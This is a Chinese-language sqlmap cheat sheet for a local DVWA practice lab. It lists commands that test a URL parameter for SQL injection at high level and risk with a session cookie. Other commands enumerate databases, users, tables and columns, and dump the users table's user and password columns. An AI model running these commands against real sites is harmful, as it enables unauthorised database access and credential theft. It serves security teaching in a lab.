Sqlmap的使用
1、扫描地址:Sqlmap -u “http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=2”
2、忽略选项:Sqlmap -u “http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=2” --batch
3、提升扫描等级:Sqlmap -u “http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=2” --batch --level=5
4、提升风险等级:Sqlmap -u “http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=2” --batch --level=5 --risk=3
5、指定参数:http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=2&Submit=Submit&user_token=3727f8a70866e851a5b7c7cc5d734560# -p id
6、指定数据库:Sqlmap -u “http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=2”--dbms=mysql
7、添加cookie sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=4" --batch--cookie=" security=low; PHPSESSID=8pesrkar3h1oukf3s29f9bi9r1"
获取库
8、获得数据库名
sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=4" --batch--cookie=" security=low; PHPSESSID=8pesrkar3h1oukf3s29f9bi9r1" --dbs
- 获取当前数据库
sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=4" --batch--cookie=" security=low; PHPSESSID=8pesrkar3h1oukf3s29f9bi9r1" --current-db
- 获取所有用户名
sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=4" --batch--cookie=" security=low; PHPSESSID=8pesrkar3h1oukf3s29f9bi9r1" --users
- 获取当前用户名
sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=4" --batch--cookie=" security=low; PHPSESSID=8pesrkar3h1oukf3s29f9bi9r1" --current-user
- 获取指定库里的所有表
sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=4&Submit=Submit&user_token=2c9ae8e24b0eec7d1ff6b80363825518#" -p id --batch --cookie="security=low;PHPSESSID=8pesrkar3h1oukf3s29f9bi9r1" -D dvwa --tables
- 查找指定表里的所有列
sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=4&Submit=Submit&user_token=2c9ae8e24b0eec7d1ff6b80363825518#" -p id --batch --cookie="security=low;PHPSESSID=8pesrkar3h1oukf3s29f9bi9r1" -D dvwa -T users --columns
- Dump的用法
sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=4&Submit=Submit&user_token=2c9ae8e24b0eec7d1ff6b80363825518#" -p id --batch --cookie="security=low;PHPSESSID=8pesrkar3h1oukf3s29f9bi9r1" -D dvwa -T users --columns --dump
sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=4&Submit=Submit&user_token=2c9ae8e24b0eec7d1ff6b80363825518#" -p id --batch --cookie="security=low;PHPSESSID=8pesrkar3h1oukf3s29f9bi9r1" -D dvwa -T users -C user,password --dump